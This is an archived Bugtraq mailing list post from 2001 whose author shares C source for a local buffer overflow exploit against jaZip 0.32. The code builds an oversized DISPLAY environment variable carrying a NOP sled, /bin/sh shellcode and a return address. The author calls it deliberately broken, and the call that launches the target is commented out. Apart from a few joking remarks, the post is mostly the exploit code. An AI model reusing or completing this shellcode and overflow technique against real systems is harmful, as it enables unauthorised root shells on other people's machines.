Home page logo
/

bugtraq logo Bugtraq mailing list archives

jazip 0.32 local exploit
From: n33dl3r <n33dl3r () HOTMAIL COM>
Date: Fri, 26 Jan 2001 01:05:42 -0000

Hi folks!

In between of heavy gaming i dished up this tiny
exploit for jaZip!
Educational purposes only. Please dont abuuuse.


Hi mum, gimme some food damnit!


-- [snip - jazip-exp.c] --
/*
 *  jaZip-0.32 local buffer overflow exploit
(tested on debian)
 *
 *  usage is: ./jazip-exp <offset> <align>
 *     offset: 1500 x N (where N is positive or
negative number)
 *     align: 1-3 (0 is def.)
 *
 *  This exploit is heavily broken, to prevent
scriptkiddie abuse!
 *  Thanks to d-blood for helping me with the
shellcode.
 *
 *  c0ded by: needler @ efnet
<n33dl3r () hotmail com>
 *
 *  Oh btw.. fuck college, I'm gonna be a pro CS
player.
 */

#include <stdio.h>
#include <stdlib.h>

#define   BSIZE    2080
#define   NOPS     1500

char shellcode[] =
"\xeb\x17\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d"
"\x4e\x08\x31\xd2\xcd\x80\xe8\xe4\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x58";

int
main(int argc, char **argv, char **envp) {
  
   char overflow[BSIZE];
   int i, align = 0, offset = 0;
   u_long addy = 0xbffff9e5;
  
   if( argc > 1) offset = atoi(argv[1]);
   if( argc > 2) align  = atoi(argv[2]);
  
   memset(overflow, 0x90, BSIZE);
   memcpy(&overflow[NOPS], shellcode,
strlen(shellcode));
   memcpy(overflow, "DISPLAY=", 8);
   for( i = (NOPS + strlen(shellcode)); i < BSIZE;
i += 4)
        *(long *)&overflow[i+align] = addy +
offset;
   envp[0] = overflow;

   printf("Using address 0x%x\n", addy + offset);
// execl("/usr/X11R6/bin/jazip", "jazip", NULL);
}

-- [snip - jazip-exp.c] --

Terrorists win! (damn i lub CS)


---
yours truly,
needler


  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault